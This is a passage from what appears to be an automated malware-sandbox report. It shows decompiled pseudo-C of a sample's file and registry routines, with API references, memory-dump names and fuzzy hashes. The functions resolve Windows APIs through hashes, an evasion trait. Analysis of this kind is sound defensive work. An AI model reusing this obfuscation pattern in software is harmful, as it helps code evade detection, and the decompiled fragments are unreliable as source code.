                                                                                                                                      					_t23 = 1;
                                                                                                                                      				}
                                                                                                                                      				if(E73232F8C(0x4bcc7cba, 0x80c50a91) == 0) {
                                                                                                                                      					_push(0);
                                                                                                                                      				} else {
                                                                                                                                      					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
                                                                                                                                      					_push(_t20);
                                                                                                                                      				}
                                                                                                                                      				_t24 =  &(_t34[3]);
                                                                                                                                      				E7322C328(_t24);
                                                                                                                                      				if(E7322C33C(_t24) != 0) {
                                                                                                                                      					_t34[2] = E7323352C(0xc0000000);
                                                                                                                                      					_t12 = 0;
                                                                                                                                      					goto L12;
                                                                                                                                      				} else {
                                                                                                                                      					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
                                                                                                                                      						_t33 = E73232F8C(0x4bcc7cba, 0xceed09cc);
                                                                                                                                      						if(_t33 != 0) {
                                                                                                                                      							 *_t33( *_t24, 0, 0, 2);
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					_t41 = _t42 + 8;
                                                                                                                                      					E732335D4(_t41, 0xff, 8);
                                                                                                                                      					_t42 = _t42 + 0xc;
                                                                                                                                      					_t15 = E73232F8C(0x4bcc7cba, 0xaaa9bb);
                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                      						_t12 = 1;
                                                                                                                                      						L12:
                                                                                                                                      						return _t12;
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t41);
                                                                                                                                      						_push(_t41);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push( *_t24);
                                                                                                                                      						asm("int3");
                                                                                                                                      						return _t15;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}

















                                                                                                                                      0x73235b29
                                                                                                                                      0x73235b2d
                                                                                                                                      0x73235b30
                                                                                                                                      0x73235b33
                                                                                                                                      0x73235b75
                                                                                                                                      0x73235b7e
                                                                                                                                      0x73235b84
                                                                                                                                      0x73235b85
                                                                                                                                      0x73235b77
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b9b
                                                                                                                                      0x73235baf
                                                                                                                                      0x73235b9d
                                                                                                                                      0x73235baa
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bb1
                                                                                                                                      0x73235bb6
                                                                                                                                      0x73235bc4
                                                                                                                                      0x73235c2f
                                                                                                                                      0x73235c32
                                                                                                                                      0x00000000
                                                                                                                                      0x73235bc6
                                                                                                                                      0x73235bcb
                                                                                                                                      0x73235c18
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235bcd
                                                                                                                                      0x73235bd9
                                                                                                                                      0x73235bde
                                                                                                                                      0x73235beb
                                                                                                                                      0x73235bf2
                                                                                                                                      0x73235bfe
                                                                                                                                      0x73235bff
                                                                                                                                      0x73235c06
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf5
                                                                                                                                      0x73235bf6
                                                                                                                                      0x73235bf8
                                                                                                                                      0x73235bfa
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bf2

                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73235BAA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                      • Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
                                                                                                                                      • Instruction ID: bfd3a4066716212df8be78a7ab4ae1914242b1a722addfc89fd9b04ef3083efc
                                                                                                                                      • Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
                                                                                                                                      • Instruction Fuzzy Hash: 3601A7E0380307BBFB1116108C81F3B7EAEDFC3645FA54865B98A660D9DFA198C88121
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 52%
                                                                                                                                      			E73235B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                      				void* _t7;
                                                                                                                                      				void* _t12;
                                                                                                                                      				void* _t15;
                                                                                                                                      				void* _t20;
                                                                                                                                      				void* _t22;
                                                                                                                                      				long _t23;
                                                                                                                                      				WCHAR** _t24;
                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                      				WCHAR** _t34;
                                                                                                                                      				long _t38;
                                                                                                                                      				void* _t40;
                                                                                                                                      				void* _t41;
                                                                                                                                      
                                                                                                                                      				_t34 = __edi;
                                                                                                                                      				_t38 = 2;
                                                                                                                                      				asm("adc ebp, 0x0");
                                                                                                                                      				if(__ebx != 2) {
                                                                                                                                      					_t7 = 3;
                                                                                                                                      					_t22 = 0;
                                                                                                                                      					_t23 =  ==  ? _t7 : _t22;
                                                                                                                                      				} else {
                                                                                                                                      					_t23 = 1;
                                                                                                                                      				}
                                                                                                                                      				if(E73232F8C(0x4bcc7cba, 0x80c50a91) == 0) {
                                                                                                                                      					_push(0);
                                                                                                                                      				} else {
                                                                                                                                      					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
                                                                                                                                      					_push(_t20);
                                                                                                                                      				}
                                                                                                                                      				_t24 =  &(_t34[3]);
                                                                                                                                      				E7322C328(_t24);
                                                                                                                                      				if(E7322C33C(_t24) != 0) {
                                                                                                                                      					_t34[2] = E7323352C(0xc0000000);
                                                                                                                                      					_t12 = 0;
                                                                                                                                      					goto L12;
                                                                                                                                      				} else {
                                                                                                                                      					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
                                                                                                                                      						_t33 = E73232F8C(0x4bcc7cba, 0xceed09cc);
                                                                                                                                      						if(_t33 != 0) {
                                                                                                                                      							 *_t33( *_t24, 0, 0, 2);
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					_t40 = _t41 + 8;
                                                                                                                                      					E732335D4(_t40, 0xff, 8);
                                                                                                                                      					_t41 = _t41 + 0xc;
                                                                                                                                      					_t15 = E73232F8C(0x4bcc7cba, 0xaaa9bb);
                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                      						_t12 = 1;
                                                                                                                                      						L12:
                                                                                                                                      						return _t12;
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t40);
                                                                                                                                      						_push(_t40);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push( *_t24);
                                                                                                                                      						asm("int3");
                                                                                                                                      						return _t15;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}















                                                                                                                                      0x73235b3d
                                                                                                                                      0x73235b44
                                                                                                                                      0x73235b47
                                                                                                                                      0x73235b75
                                                                                                                                      0x73235b7e
                                                                                                                                      0x73235b84
                                                                                                                                      0x73235b85
                                                                                                                                      0x73235b77
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b9b
                                                                                                                                      0x73235baf
                                                                                                                                      0x73235b9d
                                                                                                                                      0x73235baa
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bb1
                                                                                                                                      0x73235bb6
                                                                                                                                      0x73235bc4
                                                                                                                                      0x73235c2f
                                                                                                                                      0x73235c32
                                                                                                                                      0x00000000
                                                                                                                                      0x73235bc6
                                                                                                                                      0x73235bcb
                                                                                                                                      0x73235c18
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235bcd
                                                                                                                                      0x73235bd9
                                                                                                                                      0x73235bde
                                                                                                                                      0x73235beb
                                                                                                                                      0x73235bf2
                                                                                                                                      0x73235bfe
                                                                                                                                      0x73235bff
                                                                                                                                      0x73235c06
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf5
                                                                                                                                      0x73235bf6
                                                                                                                                      0x73235bf8
                                                                                                                                      0x73235bfa
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bf2

                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73235BAA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                      • Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
                                                                                                                                      • Instruction ID: 93485b62ad2a75ba1b4aaa03a941ceddff44655eba545a0a1581e3217555d0f2
                                                                                                                                      • Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
                                                                                                                                      • Instruction Fuzzy Hash: 1501DBE43403177BFB1116118C81F3F7E9FDF83245FA54865B98A660C9DFB598D88121
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 54%
                                                                                                                                      			E73235B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                      				void* _t6;
                                                                                                                                      				void* _t11;
                                                                                                                                      				void* _t14;
                                                                                                                                      				void* _t19;
                                                                                                                                      				void* _t21;
                                                                                                                                      				long _t22;
                                                                                                                                      				WCHAR** _t23;
                                                                                                                                      				intOrPtr* _t30;
                                                                                                                                      				WCHAR** _t31;
                                                                                                                                      				long _t35;
                                                                                                                                      				void* _t37;
                                                                                                                                      				void* _t38;
                                                                                                                                      
                                                                                                                                      				_t31 = __edi;
                                                                                                                                      				_t35 = 3;
                                                                                                                                      				if(__ebx != 2) {
                                                                                                                                      					_t6 = 3;
                                                                                                                                      					_t21 = 0;
                                                                                                                                      					_t22 =  ==  ? _t6 : _t21;
                                                                                                                                      				} else {
                                                                                                                                      					_t22 = 1;
                                                                                                                                      				}
                                                                                                                                      				if(E73232F8C(0x4bcc7cba, 0x80c50a91) == 0) {
                                                                                                                                      					_push(0);
                                                                                                                                      				} else {
                                                                                                                                      					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
                                                                                                                                      					_push(_t19);
                                                                                                                                      				}
                                                                                                                                      				_t23 =  &(_t31[3]);
                                                                                                                                      				E7322C328(_t23);
                                                                                                                                      				if(E7322C33C(_t23) != 0) {
                                                                                                                                      					_t31[2] = E7323352C(0x100);
                                                                                                                                      					_t11 = 0;
                                                                                                                                      					goto L12;
                                                                                                                                      				} else {
                                                                                                                                      					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
                                                                                                                                      						_t30 = E73232F8C(0x4bcc7cba, 0xceed09cc);
                                                                                                                                      						if(_t30 != 0) {
                                                                                                                                      							 *_t30( *_t23, 0, 0, 2);
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					_t37 = _t38 + 8;
                                                                                                                                      					E732335D4(_t37, 0xff, 8);
                                                                                                                                      					_t38 = _t38 + 0xc;
                                                                                                                                      					_t14 = E73232F8C(0x4bcc7cba, 0xaaa9bb);
                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                      						_t11 = 1;
                                                                                                                                      						L12:
                                                                                                                                      						return _t11;
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t37);
                                                                                                                                      						_push(_t37);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push( *_t23);
                                                                                                                                      						asm("int3");
                                                                                                                                      						return _t14;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}















                                                                                                                                      0x73235b1f
                                                                                                                                      0x73235b26
                                                                                                                                      0x73235b75
                                                                                                                                      0x73235b7e
                                                                                                                                      0x73235b84
                                                                                                                                      0x73235b85
                                                                                                                                      0x73235b77
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b9b
                                                                                                                                      0x73235baf
                                                                                                                                      0x73235b9d
                                                                                                                                      0x73235baa
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bb1
                                                                                                                                      0x73235bb6
                                                                                                                                      0x73235bc4
                                                                                                                                      0x73235c2f
                                                                                                                                      0x73235c32
                                                                                                                                      0x00000000
                                                                                                                                      0x73235bc6
                                                                                                                                      0x73235bcb
                                                                                                                                      0x73235c18
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235bcd
                                                                                                                                      0x73235bd9
                                                                                                                                      0x73235bde
                                                                                                                                      0x73235beb
                                                                                                                                      0x73235bf2
                                                                                                                                      0x73235bfe
                                                                                                                                      0x73235bff
                                                                                                                                      0x73235c06
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf5
                                                                                                                                      0x73235bf6
                                                                                                                                      0x73235bf8
                                                                                                                                      0x73235bfa
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bf2

                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73235BAA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                      • Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
                                                                                                                                      • Instruction ID: 4b0a37cba479393b91d6b1fbecccaf383c5b4e110b6de9343ab9dc35567114bd
                                                                                                                                      • Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
                                                                                                                                      • Instruction Fuzzy Hash: 650186F0390307BBEB1216108C81F2B7E6EDF87644FA40865B98A660D9DFA195D88161
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 54%
                                                                                                                                      			E73235B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
                                                                                                                                      				void* _t6;
                                                                                                                                      				void* _t11;
                                                                                                                                      				void* _t14;
                                                                                                                                      				void* _t19;
                                                                                                                                      				void* _t21;
                                                                                                                                      				long _t22;
                                                                                                                                      				WCHAR** _t23;
                                                                                                                                      				intOrPtr* _t30;
                                                                                                                                      				WCHAR** _t31;
                                                                                                                                      				long _t35;
                                                                                                                                      				void* _t37;
                                                                                                                                      				void* _t38;
                                                                                                                                      
                                                                                                                                      				_t31 = __edi;
                                                                                                                                      				_t35 = 3;
                                                                                                                                      				if(__ebx != 2) {
                                                                                                                                      					_t6 = 3;
                                                                                                                                      					_t21 = 0;
                                                                                                                                      					_t22 =  ==  ? _t6 : _t21;
                                                                                                                                      				} else {
                                                                                                                                      					_t22 = 1;
                                                                                                                                      				}
                                                                                                                                      				if(E73232F8C(0x4bcc7cba, 0x80c50a91) == 0) {
                                                                                                                                      					_push(0);
                                                                                                                                      				} else {
                                                                                                                                      					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
                                                                                                                                      					_push(_t19);
                                                                                                                                      				}
                                                                                                                                      				_t23 =  &(_t31[3]);
                                                                                                                                      				E7322C328(_t23);
                                                                                                                                      				if(E7322C33C(_t23) != 0) {
                                                                                                                                      					_t31[2] = E7323352C(0);
                                                                                                                                      					_t11 = 0;
                                                                                                                                      					goto L12;
                                                                                                                                      				} else {
                                                                                                                                      					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
                                                                                                                                      						_t30 = E73232F8C(0x4bcc7cba, 0xceed09cc);
                                                                                                                                      						if(_t30 != 0) {
                                                                                                                                      							 *_t30( *_t23, 0, 0, 2);
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					_t37 = _t38 + 8;
                                                                                                                                      					E732335D4(_t37, 0xff, 8);
                                                                                                                                      					_t38 = _t38 + 0xc;
                                                                                                                                      					_t14 = E73232F8C(0x4bcc7cba, 0xaaa9bb);
                                                                                                                                      					if(_t14 == 0) {
                                                                                                                                      						_t11 = 1;
                                                                                                                                      						L12:
                                                                                                                                      						return _t11;
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t37);
                                                                                                                                      						_push(_t37);
                                                                                                                                      						_push(0);
                                                                                                                                      						_push( *_t23);
                                                                                                                                      						asm("int3");
                                                                                                                                      						return _t14;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}















                                                                                                                                      0x73235b6d
                                                                                                                                      0x73235b71
                                                                                                                                      0x73235b75
                                                                                                                                      0x73235b7e
                                                                                                                                      0x73235b84
                                                                                                                                      0x73235b85
                                                                                                                                      0x73235b77
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b79
                                                                                                                                      0x73235b9b
                                                                                                                                      0x73235baf
                                                                                                                                      0x73235b9d
                                                                                                                                      0x73235baa
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bac
                                                                                                                                      0x73235bb1
                                                                                                                                      0x73235bb6
                                                                                                                                      0x73235bc4
                                                                                                                                      0x73235c2f
                                                                                                                                      0x73235c32
                                                                                                                                      0x00000000
                                                                                                                                      0x73235bc6
                                                                                                                                      0x73235bcb
                                                                                                                                      0x73235c18
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c26
                                                                                                                                      0x73235c1c
                                                                                                                                      0x73235bcd
                                                                                                                                      0x73235bd9
                                                                                                                                      0x73235bde
                                                                                                                                      0x73235beb
                                                                                                                                      0x73235bf2
                                                                                                                                      0x73235bfe
                                                                                                                                      0x73235bff
                                                                                                                                      0x73235c06
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf4
                                                                                                                                      0x73235bf5
                                                                                                                                      0x73235bf6
                                                                                                                                      0x73235bf8
                                                                                                                                      0x73235bfa
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bfb
                                                                                                                                      0x73235bf2

                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 73235BAA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                      • Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
                                                                                                                                      • Instruction ID: 117535faadcfb196ad3206ef1099bf7e85036492172771f9f8718e751e8c9aa3
                                                                                                                                      • Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
                                                                                                                                      • Instruction Fuzzy Hash: 19F0A4F4380317BBEB1116118C81F3FBE6EEF83644FA40C68B94A660D9DFA295D88171
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 63%
                                                                                                                                      			E73235D7C(void* __ecx, intOrPtr _a4) {
                                                                                                                                      				long _v16;
                                                                                                                                      				long _t4;
                                                                                                                                      				void* _t8;
                                                                                                                                      				void** _t9;
                                                                                                                                      				intOrPtr _t17;
                                                                                                                                      				long* _t18;
                                                                                                                                      
                                                                                                                                      				_push(_t16);
                                                                                                                                      				_t8 = __ecx;
                                                                                                                                      				_t17 = _a4;
                                                                                                                                      				if(_t17 != 0) {
                                                                                                                                      					asm("pxor xmm0, xmm0");
                                                                                                                                      					asm("movq [esi], xmm0");
                                                                                                                                      				}
                                                                                                                                      				_t9 = _t8 + 0xc;
                                                                                                                                      				if(E7322C33C(_t9) != 0) {
                                                                                                                                      					L7:
                                                                                                                                      					_t4 = 0;
                                                                                                                                      					goto L10;
                                                                                                                                      				} else {
                                                                                                                                      					asm("stosd");
                                                                                                                                      					asm("stosd");
                                                                                                                                      					if(E73232F8C(0x4bcc7cba, 0xceed09cc) == 0) {
                                                                                                                                      						_t4 = 0;
                                                                                                                                      					} else {
                                                                                                                                      						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
                                                                                                                                      					}
                                                                                                                                      					if(_t4 != 0xffffffff) {
                                                                                                                                      						if(_t17 != 0) {
                                                                                                                                      							 *_t18 = _t4;
                                                                                                                                      							asm("movq xmm0, [esp]");
                                                                                                                                      							asm("movq [esi], xmm0");
                                                                                                                                      						}
                                                                                                                                      						L10:
                                                                                                                                      						return _t4;
                                                                                                                                      					} else {
                                                                                                                                      						goto L7;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}









                                                                                                                                      0x73235d80
                                                                                                                                      0x73235d81
                                                                                                                                      0x73235d83
                                                                                                                                      0x73235d89
                                                                                                                                      0x73235d8b
                                                                                                                                      0x73235d8f
                                                                                                                                      0x73235d8f
                                                                                                                                      0x73235d93
                                                                                                                                      0x73235d9f
                                                                                                                                      0x73235dd3
                                                                                                                                      0x73235dd3
                                                                                                                                      0x00000000
                                                                                                                                      0x73235da1
                                                                                                                                      0x73235da6
                                                                                                                                      0x73235da7
                                                                                                                                      0x73235dbb
                                                                                                                                      0x73235dcc
                                                                                                                                      0x73235dbd
                                                                                                                                      0x73235dc8
                                                                                                                                      0x73235dc8
                                                                                                                                      0x73235dd1
                                                                                                                                      0x73235dd9
                                                                                                                                      0x73235ddb
                                                                                                                                      0x73235dde
                                                                                                                                      0x73235de3
                                                                                                                                      0x73235de3
                                                                                                                                      0x73235de7
                                                                                                                                      0x73235dec
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73235dd1

                                                                                                                                      APIs
                                                                                                                                      • SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,73235CB4,?,?), ref: 73235DC8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                      • Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
                                                                                                                                      • Instruction ID: 2ef169fcbc49e9e72832ac6d55b26b0e8dd7a5644ecf5b3eeca018b58f336e2d
                                                                                                                                      • Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
                                                                                                                                      • Instruction Fuzzy Hash: D7F07DF1A147162AD3111A389C44BAB7BF5DFD3710F740B2EF585A7084E76084C04190
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E732355B8(void* __ecx) {
                                                                                                                                      				long _t9;
                                                                                                                                      				char* _t11;
                                                                                                                                      				void* _t16;
                                                                                                                                      				int _t17;
                                                                                                                                      				int _t18;
                                                                                                                                      				int* _t19;
                                                                                                                                      
                                                                                                                                      				_t18 = 0;
                                                                                                                                      				_t17 = _t19[0x48];
                                                                                                                                      				_t16 = __ecx;
                                                                                                                                      				_t11 =  &(_t19[1]);
                                                                                                                                      				 *_t17 = 0;
                                                                                                                                      				 *((intOrPtr*)(_t17 + 4)) = 0;
                                                                                                                                      				 *((intOrPtr*)(_t17 + 8)) = 0;
                                                                                                                                      				while(1) {
                                                                                                                                      					 *_t19 = 0x105;
                                                                                                                                      					if(E73232F8C(0xd0443458, 0x286b2253) == 0) {
                                                                                                                                      						goto L4;
                                                                                                                                      					}
                                                                                                                                      					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                      						goto L4;
                                                                                                                                      					}
                                                                                                                                      					return _t17;
                                                                                                                                      					L4:
                                                                                                                                      					E7322E6E8(_t17, _t11,  *_t17);
                                                                                                                                      					_t18 = _t18 + 1;
                                                                                                                                      				}
                                                                                                                                      			}









                                                                                                                                      0x732355c2
                                                                                                                                      0x732355c4
                                                                                                                                      0x732355cb
                                                                                                                                      0x732355cd
                                                                                                                                      0x732355d1
                                                                                                                                      0x732355d3
                                                                                                                                      0x732355d6
                                                                                                                                      0x732355d9
                                                                                                                                      0x732355d9
                                                                                                                                      0x732355f3
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73235604
                                                                                                                                      0x73235608
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x73235616
                                                                                                                                      0x73235619
                                                                                                                                      0x7323561e
                                                                                                                                      0x73235623
                                                                                                                                      0x73235623

                                                                                                                                      APIs
                                                                                                                                      • RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 73235604
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2814608202-0
                                                                                                                                      • Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
                                                                                                                                      • Instruction ID: f00836fad8311c58a968b7774defeeaa7e5423d55caf62c44edec2fe5aa1e8f2
                                                                                                                                      • Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
                                                                                                                                      • Instruction Fuzzy Hash: 7CF0AFF56003096FE7259E1ADC44EB7BBFDEBC1B14F14841EB0D643240DA70A8918AA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 45%
                                                                                                                                      			E732310CC(void* __ecx) {
                                                                                                                                      				void* _v36;
                                                                                                                                      				void* _v44;
                                                                                                                                      				int _t15;
                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                      				void* _t24;
                                                                                                                                      				intOrPtr* _t25;
                                                                                                                                      
                                                                                                                                      				_t24 = __ecx;
                                                                                                                                      				 *_t25 = 0;
                                                                                                                                      				_t21 = E73232F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
                                                                                                                                      				if(_t21 == 0) {
